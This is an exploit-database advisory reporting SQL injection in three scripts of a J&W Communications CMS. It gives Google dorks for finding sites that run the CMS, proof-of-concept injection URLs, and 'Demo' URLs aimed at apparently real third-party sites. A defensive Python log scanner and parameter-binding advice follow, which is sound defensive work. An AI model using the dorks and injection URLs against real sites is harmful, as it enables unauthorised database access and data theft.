J&W Communications SQL Injection

2014.07.30
Credit: Hekt0r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

[+] Title: J&W Communications Cms SQL Injection Vulnerability
[+] Date: 2014-07-29
[+] Author: Hekt0r
[+] Vendor Homepage: www.jw-com.com
[+] Tested on: Windows7 & Kali Linux
[+] Vulnerable Files:
/rosters.php
/team.php
/scoresheet.php
[+] Dork :
intext:"designed by J&W Communications"
inurl:/team.php.php?id=
inurl:/rosters.php?id=
inurl:/scoresheet.php?sched_id=

### POC:
http://site/team.php.php?id=[SQL-Injection]
http://site/rosters.php?id=[SQL-Injection]
http://site/scoresheet.php?sched_id=[SQL-Injection]

### Demo:
http://www.ambhXl.ab.ca/team.php?id=132%27
http://edmbantamtoXurney.com/rosters.php?id=19%27
http://www.pwXnhl.ca/scoresheet.php?sched_id=44%27

### Credits:
[+] Special Thanks: Root SmasheR, Mr.Moein, UmPire, Ali Ahmady, Saeed.Jok3r M4hdi, Black Hacker, Vahid Her, BlackErroR, Phantom.S3c And All members of Iran Security Group
[+] iransec.net
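For site operators running this CMS, a log check for the pattern shown above (added example, not part of the original advisory or the vendor's code): it flags requests to the three listed scripts whose id or sched_id value is not a plain integer after percent-decoding. The combined access-log format, the function name and the sample lines are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> identifier parameter, taken from the advisory's list of vulnerable files.
WATCHED = {"/team.php": "id", "/rosters.php": "id", "/scoresheet.php": "sched_id"}

# Client IP, request target and status from a combined-format log line (assumed format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def suspicious_requests(lines):
    """Return (ip, path, param, decoded value, status) for every request to a
    watched script whose identifier parameter is not a plain decimal integer."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        url = urlsplit(m.group("target"))
        param = WATCHED.get(url.path.lower())
        if param is None:
            continue  # script is not one of the three listed files
        # parse_qsl percent-decodes, so %27 shows up here as a literal quote.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == param and not re.fullmatch(r"\d{1,10}", value):
                hits.append((m.group("ip"), url.path, name, value, int(m.group("status"))))
    return hits

# Constructed sample log lines (documentation IP ranges, no real hosts).
SAMPLE_LOG = [
    '198.51.100.7 - - [29/Jul/2014:10:01:02 +0000] "GET /team.php?id=132 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [29/Jul/2014:10:01:05 +0000] "GET /team.php?id=132%27 HTTP/1.1" 200 312',
    '203.0.113.9 - - [29/Jul/2014:10:01:09 +0000] "GET /rosters.php?id=19%27 HTTP/1.1" 500 0',
    '198.51.100.7 - - [29/Jul/2014:10:02:00 +0000] "GET /scoresheet.php?sched_id=44 HTTP/1.1" 200 9001',
    '203.0.113.9 - - [29/Jul/2014:10:02:11 +0000] "GET /scoresheet.php?sched_id=44%27 HTTP/1.1" 200 298',
    '198.51.100.7 - - [29/Jul/2014:10:03:00 +0000] "GET /news.php?id=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule is the server-side fix for CWE-89 on these parameters: reject or cast the value before it reaches the query, and bind it as a parameter rather than concatenating it.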



Copyright 2024, cxsecurity.com

 
